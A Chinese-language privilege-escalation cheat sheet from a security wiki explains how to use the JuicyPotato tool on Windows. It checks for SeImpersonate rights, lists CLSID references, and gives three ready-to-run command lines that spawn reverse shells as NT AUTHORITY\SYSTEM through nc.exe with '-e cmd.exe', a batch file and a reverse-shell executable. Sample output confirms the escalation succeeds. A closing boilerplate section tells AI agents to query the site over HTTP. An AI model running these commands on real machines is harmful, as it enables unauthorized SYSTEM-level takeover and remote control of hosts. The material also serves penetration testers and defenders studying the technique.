# JuicyPotato

```
Juicy Potato
如果机器>= Windows 10 1809 & Windows Server 2019 - 尝试Rogue Potato
如果机器< Windows 10 1809 < Windows Server 2019 - 尝试Juicy Potato
https://github.com/ohpe/juicy-potato/releases
检查服务帐户的权限，寻找SeImpersonate/或SeAssignPrimaryToken
whoami /priv
根据您的 Windows 版本选择 CLSID，CLSID 是标识 COM 类对象的全局唯一标识符
https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise
https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise
https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise
https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro
https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise
https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter
https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard
执行 JuicyPotato 以运行特权命令
>JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
>JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
>JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
    Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
    ......
    [+] authresult 0
    {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
    [+] CreateProcessWithTokenW OK
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/quan-xian-ti-sheng/windows-ti-quan/juicypotato.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.